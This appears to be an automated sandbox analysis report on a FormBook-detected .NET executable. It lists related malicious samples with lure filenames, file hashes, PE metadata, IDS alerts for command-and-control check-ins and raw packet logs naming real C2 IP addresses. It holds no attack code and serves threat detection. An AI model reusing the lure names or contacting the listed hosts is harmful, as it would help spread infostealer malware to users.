	15j1TCnOiA.xlsm	Get hash	malicious	Browse	192.185.115.105
	e8eRhf3GM0.xlsm	Get hash	malicious	Browse	162.241.190.216
	SOA PDF.exe	Get hash	malicious	Browse	192.185.226.148
	djBLaxEojp.exe	Get hash	malicious	Browse	192.185.161.67
	quotation 35420PDF.exe	Get hash	malicious	Browse	192.185.41.225
	REQUEST FOR PRICE QUOTE - URGENT.pdf.exe	Get hash	malicious	Browse	162.241.24.59
	551f47ac_by_Libranalysis.xlsm	Get hash	malicious	Browse	192.185.138.180
VECTANTARTERIANetworksCorporationJP	1c60a1e9_by_Libranalysis.rtf	Get hash	malicious	Browse	202.210.8.86
	Purchase Inquiry 11.05.2021.exe	Get hash	malicious	Browse	202.210.8.60
	0876543123.exe	Get hash	malicious	Browse	202.210.8.120
	Project Decision 2021.exe	Get hash	malicious	Browse	183.181.86.59
	S4gONKzrzB.exe	Get hash	malicious	Browse	210.131.150.117
	PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exe	Get hash	malicious	Browse	202.210.8.149
	VIKRAMQST21-222.exe	Get hash	malicious	Browse	202.210.8.149
	MGuvcs6Ocz	Get hash	malicious	Browse	157.14.182.109
	SWIFT COPY.exe	Get hash	malicious	Browse	103.141.96.11
	9JFrEPf5w7.exe	Get hash	malicious	Browse	103.15.186.68
	Purchase Order.xlsx	Get hash	malicious	Browse	103.15.186.68
	PO91361.exe	Get hash	malicious	Browse	103.15.186.10
	ccavero@hycite.com.htm	Get hash	malicious	Browse	203.114.55.132
	MV Sky Marine.xlsx	Get hash	malicious	Browse	202.210.8.141
	SWIFT COPY_PDF.exe	Get hash	malicious	Browse	202.210.8.141
	MV9tCJw8Xr.exe	Get hash	malicious	Browse	120.51.34.254
	SHED.EXE	Get hash	malicious	Browse	103.141.96.21
	swift copy pdf.exe	Get hash	malicious	Browse	183.181.84.122
	shipping docs of MT20410.exe	Get hash	malicious	Browse	183.181.84.122
	PO#4503527426.xlsx	Get hash	malicious	Browse	43.249.241.188
DOSARRESTUS	in.exe	Get hash	malicious	Browse	52.128.23.153
	REQUEST FOR NEW ORDER AND SPECIFICATIONS.exe	Get hash	malicious	Browse	52.128.23.153
	krJF4BtzSv.exe	Get hash	malicious	Browse	52.128.23.153
	PO_29_00412.exe	Get hash	malicious	Browse	52.128.23.153
	DHL_S390201.exe	Get hash	malicious	Browse	52.128.23.153
	y6f8O0kbEB.exe	Get hash	malicious	Browse	52.128.23.153
	scan copy 2402021.exe	Get hash	malicious	Browse	52.128.23.153
	Betaling_advies.exe	Get hash	malicious	Browse	52.128.23.153
	Order.exe	Get hash	malicious	Browse	52.128.23.218
	MACHINE SPECIFICATION.exe	Get hash	malicious	Browse	52.128.23.153
	bank details.exe	Get hash	malicious	Browse	52.128.23.218
	50729032021.xlsx	Get hash	malicious	Browse	52.128.23.153
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	52.128.23.153
	Shipping Documents C1216.exe	Get hash	malicious	Browse	52.128.23.153
	9V3LjvhSMb.exe	Get hash	malicious	Browse	52.128.23.153
	RDAW-180-47D.exe	Get hash	malicious	Browse	52.128.23.153
	gV8xdP8bas.exe	Get hash	malicious	Browse	52.128.23.153
	m5bCbJdk7l.exe	Get hash	malicious	Browse	52.128.23.153
	xloa.exe	Get hash	malicious	Browse	52.128.23.153
	rbyB1UHXxR.exe	Get hash	malicious	Browse	52.128.23.153

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\457b22da_by_Libranalysis.exe.log Download File
Process:	C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:ML9E4Ks2f84jE4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MxHKXfvjHKx1qHiYHKhQnoPtHoxHhAHR
MD5:	8198C64CE0786EABD4C792E7E6FC30E5
SHA1:	71E1676126F4616B18C751A0A775B2D64944A15A
SHA-256:	C58018934011086A883D1D56B21F6C1916B1CD83206ADD1865C9BDD29DADCBC4
SHA-512:	EE293C0F88A12AB10041F66DDFAE89BC11AB3B3AAD8604F1A418ABE43DF0980245C3B7F8FEB709AEE8E9474841A280E073EC063045EA39948E853AA6B4EC0FB0
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.70861569543812
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	457b22da_by_Libranalysis.exe
File size:	973824
MD5:	457b22da77d4db093a31dd80a4b8963f
SHA1:	83dc32633108d309f6b6b50a42dc102e7375f54c
SHA256:	8dc4c1a88f19df4a3731991e632688147b6132bcb6cffa2dfbef8ee081c6ddae
SHA512:	988bc10454baea85766b9af43d51073a155b17c63525795b55984e362b81e2e11717b947ce11c05d010682f8b92f5c73cc3918401b23cbaa44bfe976dec6d45e
SSDEEP:	24576:0Fu7fEF8VAJUFZ+MEEcg1B3DBp3LQySL683Olkck:oKeco9gXdBs681c
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..`..............P.............. ....... ....@.. .......................@............@................................

File Icon


Icon Hash:	c4b2f0f0f0f0b2c4

Static PE Info

General
Entrypoint:	0x4f200a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x609B8954 [Wed May 12 07:52:52 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004F2000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb887c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x2b910	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf2000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0xb8000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
U#j;F_`	0x2000	0xb5830	0xb5a00	False	1.00031723159	data	7.99977911602	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.text	0xb8000	0xbe88	0xc000	False	0.443664550781	data	5.98775061458	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xc4000	0x2b910	0x2ba00	False	0.166323424069	data	4.59329432672	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf0000	0xc	0x200	False	0.044921875	data	0.0980041756627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0xf2000	0x10	0x200	False	0.044921875	data	0.142635768149	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xc42e0	0x2f94	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0xc7274	0x10828	dBase III DBT, version number 0, next free block index 40
RT_ICON	0xd7a9c	0x94a8	data
RT_ICON	0xe0f44	0x5488	data
RT_ICON	0xe63cc	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4278648832
RT_ICON	0xea5f4	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_ICON	0xecb9c	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
RT_ICON	0xedc44	0x988	data
RT_ICON	0xee5cc	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xeea34	0x84	data
RT_GROUP_ICON	0xeeab8	0x14	data
RT_VERSION	0xeeacc	0x3dc	data
RT_MANIFEST	0xeeea8	0xa65	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2013
Assembly Version	3.0.0.0
InternalName	DynamicPartitionEnumeratorForIndexRangeAbstract.exe
FileVersion	3.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	ServerManager_Core
ProductVersion	3.0.0.0
FileDescription	ServerManager_Core
OriginalFilename	DynamicPartitionEnumeratorForIndexRangeAbstract.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/12/21-12:25:36.062502	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49731	80	192.168.2.3	34.95.69.141
05/12/21-12:25:36.062502	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49731	80	192.168.2.3	34.95.69.141
05/12/21-12:25:36.062502	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49731	80	192.168.2.3	34.95.69.141
05/12/21-12:26:02.702057	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49740	80	192.168.2.3	156.252.96.189
05/12/21-12:26:02.702057	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49740	80	192.168.2.3	156.252.96.189
05/12/21-12:26:02.702057	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49740	80	192.168.2.3	156.252.96.189
05/12/21-12:26:30.319867	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.3	184.168.131.241
05/12/21-12:26:30.319867	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.3	184.168.131.241
05/12/21-12:26:30.319867	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.3	184.168.131.241

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 12:25:24.196033955 CEST	49728	80	192.168.2.3	52.128.23.153
May 12, 2021 12:25:24.380028963 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.380197048 CEST	49728	80	192.168.2.3	52.128.23.153
May 12, 2021 12:25:24.565099001 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.565185070 CEST	49728	80	192.168.2.3	52.128.23.153
May 12, 2021 12:25:24.747908115 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.747936010 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.747955084 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.747977018 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.747996092 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.748023033 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.748044968 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.748064041 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.748070955 CEST	49728	80	192.168.2.3	52.128.23.153
May 12, 2021 12:25:24.748081923 CEST	80	49728	52.128.23.153	192.168.2.3
May 12, 2021 12:25:24.748102903 CEST	49728	80	192.168.2.3	52.128.23.153
May 12, 2021 12:25:24.748121023 CEST	49728	80	192.168.2.3	52.128.23.153
May 12, 2021 12:25:24.748218060 CEST	49728	80	192.168.2.3	52.128.23.153
May 12, 2021 12:25:30.060600996 CEST	49730	80	192.168.2.3	202.210.8.86
May 12, 2021 12:25:30.334333897 CEST	80	49730	202.210.8.86	192.168.2.3
May 12, 2021 12:25:30.334551096 CEST	49730	80	192.168.2.3	202.210.8.86
May 12, 2021 12:25:30.334672928 CEST	49730	80	192.168.2.3	202.210.8.86
May 12, 2021 12:25:30.608279943 CEST	80	49730	202.210.8.86	192.168.2.3
May 12, 2021 12:25:30.836106062 CEST	49730	80	192.168.2.3	202.210.8.86
May 12, 2021 12:25:31.151423931 CEST	80	49730	202.210.8.86	192.168.2.3
May 12, 2021 12:25:32.124258041 CEST	80	49730	202.210.8.86	192.168.2.3
May 12, 2021 12:25:32.124294996 CEST	80	49730	202.210.8.86	192.168.2.3
May 12, 2021 12:25:32.124427080 CEST	49730	80	192.168.2.3	202.210.8.86
May 12, 2021 12:25:32.126872063 CEST	49730	80	192.168.2.3	202.210.8.86
May 12, 2021 12:25:36.021060944 CEST	49731	80	192.168.2.3	34.95.69.141
May 12, 2021 12:25:36.062160015 CEST	80	49731	34.95.69.141	192.168.2.3
May 12, 2021 12:25:36.062482119 CEST	49731	80	192.168.2.3	34.95.69.141
May 12, 2021 12:25:36.062501907 CEST	49731	80	192.168.2.3	34.95.69.141
May 12, 2021 12:25:36.103591919 CEST	80	49731	34.95.69.141	192.168.2.3
May 12, 2021 12:25:36.103701115 CEST	80	49731	34.95.69.141	192.168.2.3
May 12, 2021 12:25:36.103723049 CEST	80	49731	34.95.69.141	192.168.2.3
May 12, 2021 12:25:36.103907108 CEST	49731	80	192.168.2.3	34.95.69.141
May 12, 2021 12:25:36.104039907 CEST	49731	80	192.168.2.3	34.95.69.141
May 12, 2021 12:25:36.144942999 CEST	80	49731	34.95.69.141	192.168.2.3
May 12, 2021 12:25:46.233526945 CEST	49738	80	192.168.2.3	81.169.145.162
May 12, 2021 12:25:46.276640892 CEST	80	49738	81.169.145.162	192.168.2.3
May 12, 2021 12:25:46.276766062 CEST	49738	80	192.168.2.3	81.169.145.162
May 12, 2021 12:25:46.276973963 CEST	49738	80	192.168.2.3	81.169.145.162
May 12, 2021 12:25:46.319863081 CEST	80	49738	81.169.145.162	192.168.2.3
May 12, 2021 12:25:46.322741985 CEST	80	49738	81.169.145.162	192.168.2.3
May 12, 2021 12:25:46.322768927 CEST	80	49738	81.169.145.162	192.168.2.3
May 12, 2021 12:25:46.322952032 CEST	49738	80	192.168.2.3	81.169.145.162
May 12, 2021 12:25:46.323085070 CEST	49738	80	192.168.2.3	81.169.145.162
May 12, 2021 12:25:46.366920948 CEST	80	49738	81.169.145.162	192.168.2.3
May 12, 2021 12:25:51.537710905 CEST	49739	80	192.168.2.3	192.232.222.43
May 12, 2021 12:25:51.724255085 CEST	80	49739	192.232.222.43	192.168.2.3
May 12, 2021 12:25:51.724494934 CEST	49739	80	192.168.2.3	192.232.222.43
May 12, 2021 12:25:51.724770069 CEST	49739	80	192.168.2.3	192.232.222.43
May 12, 2021 12:25:51.909885883 CEST	80	49739	192.232.222.43	192.168.2.3
May 12, 2021 12:25:52.212724924 CEST	49739	80	192.168.2.3	192.232.222.43
May 12, 2021 12:25:52.438540936 CEST	80	49739	192.232.222.43	192.168.2.3
May 12, 2021 12:25:53.418782949 CEST	80	49739	192.232.222.43	192.168.2.3
May 12, 2021 12:25:53.418852091 CEST	49739	80	192.168.2.3	192.232.222.43
May 12, 2021 12:25:53.419245958 CEST	80	49739	192.232.222.43	192.168.2.3
May 12, 2021 12:25:53.419298887 CEST	49739	80	192.168.2.3	192.232.222.43
May 12, 2021 12:26:02.400471926 CEST	49740	80	192.168.2.3	156.252.96.189
May 12, 2021 12:26:02.701750040 CEST	80	49740	156.252.96.189	192.168.2.3
May 12, 2021 12:26:02.701894045 CEST	49740	80	192.168.2.3	156.252.96.189
May 12, 2021 12:26:02.702056885 CEST	49740	80	192.168.2.3	156.252.96.189
May 12, 2021 12:26:03.004113913 CEST	80	49740	156.252.96.189	192.168.2.3
May 12, 2021 12:26:03.197813988 CEST	49740	80	192.168.2.3	156.252.96.189
May 12, 2021 12:26:03.283816099 CEST	80	49740	156.252.96.189	192.168.2.3
May 12, 2021 12:26:03.283859015 CEST	80	49740	156.252.96.189	192.168.2.3
May 12, 2021 12:26:03.284008026 CEST	49740	80	192.168.2.3	156.252.96.189
May 12, 2021 12:26:03.285224915 CEST	49740	80	192.168.2.3	156.252.96.189
May 12, 2021 12:26:03.500299931 CEST	80	49740	156.252.96.189	192.168.2.3
May 12, 2021 12:26:03.500483036 CEST	49740	80	192.168.2.3	156.252.96.189
May 12, 2021 12:26:08.280189037 CEST	49741	80	192.168.2.3	184.168.131.241
May 12, 2021 12:26:08.492702961 CEST	80	49741	184.168.131.241	192.168.2.3
May 12, 2021 12:26:08.492861986 CEST	49741	80	192.168.2.3	184.168.131.241
May 12, 2021 12:26:08.493067980 CEST	49741	80	192.168.2.3	184.168.131.241
May 12, 2021 12:26:08.696099997 CEST	80	49741	184.168.131.241	192.168.2.3
May 12, 2021 12:26:08.756416082 CEST	80	49741	184.168.131.241	192.168.2.3
May 12, 2021 12:26:08.756465912 CEST	80	49741	184.168.131.241	192.168.2.3
May 12, 2021 12:26:08.756701946 CEST	49741	80	192.168.2.3	184.168.131.241
May 12, 2021 12:26:08.756794930 CEST	49741	80	192.168.2.3	184.168.131.241
May 12, 2021 12:26:08.959125996 CEST	80	49741	184.168.131.241	192.168.2.3
May 12, 2021 12:26:13.933931112 CEST	49744	80	192.168.2.3	64.98.145.30
May 12, 2021 12:26:14.072640896 CEST	80	49744	64.98.145.30	192.168.2.3
May 12, 2021 12:26:14.072834015 CEST	49744	80	192.168.2.3	64.98.145.30
May 12, 2021 12:26:14.073214054 CEST	49744	80	192.168.2.3	64.98.145.30
May 12, 2021 12:26:14.211807966 CEST	80	49744	64.98.145.30	192.168.2.3
May 12, 2021 12:26:14.218874931 CEST	80	49744	64.98.145.30	192.168.2.3
May 12, 2021 12:26:14.218928099 CEST	80	49744	64.98.145.30	192.168.2.3
May 12, 2021 12:26:14.219176054 CEST	49744	80	192.168.2.3	64.98.145.30
May 12, 2021 12:26:14.219377995 CEST	49744	80	192.168.2.3	64.98.145.30
May 12, 2021 12:26:30.125844955 CEST	49746	80	192.168.2.3	184.168.131.241
May 12, 2021 12:26:30.319618940 CEST	80	49746	184.168.131.241	192.168.2.3
May 12, 2021 12:26:30.319713116 CEST	49746	80	192.168.2.3	184.168.131.241
May 12, 2021 12:26:30.319866896 CEST	49746	80	192.168.2.3	184.168.131.241
May 12, 2021 12:26:30.512630939 CEST	80	49746	184.168.131.241	192.168.2.3
May 12, 2021 12:26:30.541549921 CEST	80	49746	184.168.131.241	192.168.2.3
May 12, 2021 12:26:30.541579962 CEST	80	49746	184.168.131.241	192.168.2.3
May 12, 2021 12:26:30.541796923 CEST	49746	80	192.168.2.3	184.168.131.241
May 12, 2021 12:26:30.541826963 CEST	49746	80	192.168.2.3	184.168.131.241
May 12, 2021 12:26:30.734571934 CEST	80	49746	184.168.131.241	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 12:24:11.490417957 CEST	49199	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:11.539120913 CEST	53	49199	8.8.8.8	192.168.2.3
May 12, 2021 12:24:12.578938007 CEST	50620	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:12.631120920 CEST	53	50620	8.8.8.8	192.168.2.3
May 12, 2021 12:24:14.035444975 CEST	64938	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:14.084173918 CEST	53	64938	8.8.8.8	192.168.2.3
May 12, 2021 12:24:15.181551933 CEST	60152	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:15.231316090 CEST	53	60152	8.8.8.8	192.168.2.3
May 12, 2021 12:24:15.543701887 CEST	57544	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:15.605519056 CEST	53	57544	8.8.8.8	192.168.2.3
May 12, 2021 12:24:15.981714010 CEST	55984	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:16.033436060 CEST	53	55984	8.8.8.8	192.168.2.3
May 12, 2021 12:24:17.336888075 CEST	64185	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:17.385696888 CEST	53	64185	8.8.8.8	192.168.2.3
May 12, 2021 12:24:18.181982040 CEST	65110	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:18.230753899 CEST	53	65110	8.8.8.8	192.168.2.3
May 12, 2021 12:24:19.137824059 CEST	58361	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:19.189327002 CEST	53	58361	8.8.8.8	192.168.2.3
May 12, 2021 12:24:20.389323950 CEST	63492	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:20.438283920 CEST	53	63492	8.8.8.8	192.168.2.3
May 12, 2021 12:24:21.650604963 CEST	60831	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:21.702214956 CEST	53	60831	8.8.8.8	192.168.2.3
May 12, 2021 12:24:22.792871952 CEST	60100	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:22.842051983 CEST	53	60100	8.8.8.8	192.168.2.3
May 12, 2021 12:24:24.150654078 CEST	53195	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:24.202336073 CEST	53	53195	8.8.8.8	192.168.2.3
May 12, 2021 12:24:24.988667965 CEST	50141	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:25.037595987 CEST	53	50141	8.8.8.8	192.168.2.3
May 12, 2021 12:24:26.231024981 CEST	53023	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:26.281500101 CEST	53	53023	8.8.8.8	192.168.2.3
May 12, 2021 12:24:27.036566973 CEST	49563	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:27.085688114 CEST	53	49563	8.8.8.8	192.168.2.3
May 12, 2021 12:24:30.414036036 CEST	51352	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:30.462858915 CEST	53	51352	8.8.8.8	192.168.2.3
May 12, 2021 12:24:31.331482887 CEST	59349	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:31.382544994 CEST	53	59349	8.8.8.8	192.168.2.3
May 12, 2021 12:24:32.426213026 CEST	57084	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:32.475207090 CEST	53	57084	8.8.8.8	192.168.2.3
May 12, 2021 12:24:44.212776899 CEST	58823	53	192.168.2.3	8.8.8.8
May 12, 2021 12:24:44.275077105 CEST	53	58823	8.8.8.8	192.168.2.3
May 12, 2021 12:25:01.522687912 CEST	57568	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:01.571486950 CEST	53	57568	8.8.8.8	192.168.2.3
May 12, 2021 12:25:04.099765062 CEST	50540	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:04.171396017 CEST	53	50540	8.8.8.8	192.168.2.3
May 12, 2021 12:25:24.027081966 CEST	54366	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:24.189014912 CEST	53	54366	8.8.8.8	192.168.2.3
May 12, 2021 12:25:27.239752054 CEST	53034	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:27.298490047 CEST	53	53034	8.8.8.8	192.168.2.3
May 12, 2021 12:25:29.761121035 CEST	57762	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:30.059087992 CEST	53	57762	8.8.8.8	192.168.2.3
May 12, 2021 12:25:35.858010054 CEST	55435	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:36.019768000 CEST	53	55435	8.8.8.8	192.168.2.3
May 12, 2021 12:25:40.691852093 CEST	50713	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:40.749140978 CEST	53	50713	8.8.8.8	192.168.2.3
May 12, 2021 12:25:43.211719990 CEST	56132	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:43.281693935 CEST	53	56132	8.8.8.8	192.168.2.3
May 12, 2021 12:25:46.166529894 CEST	58987	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:46.232381105 CEST	53	58987	8.8.8.8	192.168.2.3
May 12, 2021 12:25:51.342669964 CEST	56579	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:51.535154104 CEST	53	56579	8.8.8.8	192.168.2.3
May 12, 2021 12:25:57.237812042 CEST	60633	53	192.168.2.3	8.8.8.8
May 12, 2021 12:25:57.300525904 CEST	53	60633	8.8.8.8	192.168.2.3
May 12, 2021 12:26:02.336038113 CEST	61292	53	192.168.2.3	8.8.8.8
May 12, 2021 12:26:02.398396015 CEST	53	61292	8.8.8.8	192.168.2.3
May 12, 2021 12:26:08.219162941 CEST	63619	53	192.168.2.3	8.8.8.8
May 12, 2021 12:26:08.278670073 CEST	53	63619	8.8.8.8	192.168.2.3
May 12, 2021 12:26:11.962909937 CEST	64938	53	192.168.2.3	8.8.8.8
May 12, 2021 12:26:12.037271976 CEST	53	64938	8.8.8.8	192.168.2.3
May 12, 2021 12:26:13.767909050 CEST	61946	53	192.168.2.3	8.8.8.8
May 12, 2021 12:26:13.805685997 CEST	64910	53	192.168.2.3	8.8.8.8
